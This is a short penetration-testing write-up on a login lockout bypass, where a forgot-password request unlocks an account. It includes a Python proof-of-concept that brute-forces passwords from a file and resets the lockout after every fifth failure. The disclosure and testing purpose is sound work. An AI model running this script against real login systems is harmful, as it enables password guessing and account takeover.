During a recent penetration testing engagement, I discovered a vulnerability in the login page of a web application. Specifically, I found that after five unsuccessful login attempts, the account would become locked. However, I discovered that by sending a post request to the forgot password page with the email address associated with the locked account, it was possible to unlock the account without any additional verification.
This vulnerability could allow an attacker to repeatedly try different passwords in an automated fashion until the account is locked, and then use the forgot password feature to unlock the account and continue the password guessing attack.
To demonstrate the impact of this vulnerability, I created a proof-of-concept script using the Python requests library. The script reads a list of passwords from a text file, password.txt and repeatedly sends login requests to the target application, including the forgot password request after every 5th failed login attempt. The code is provided below for reference:
import requests
import json
# read the password from the password.txt file
with open("password.txt", "r") as f:
passwords = f.read().splitlines()
# set the login endpoint
login_url = "https://test.com/api/v2/accounts/Login"
# set the headers for the JSON POST request
headers = {'Content-Type': 'application/json'}
# set the login parameters
login_params = {'username': 'test@test.com'}
# send the login requests
for i, password in enumerate(passwords):
login_params['password'] = password
response = requests.post(login_url, headers=headers, json=login_params)
if i % 5 == 4:
# send request to the forgot password endpoint
forgot_url = "https://test.com/api/accounts/forgotPassword"
forgot_params = {'email': 'test@test.com'}
requests.post(forgot_url, headers=headers, json=forgot_params)
if response.status_code == 200:
print("Login success! Password: " + password.strip())
break
It is important to note that this vulnerability may be specific to the target application, and may not be present in other systems. However, this example serves as a reminder to thoroughly test account lockout and password reset functionality during security assessments.
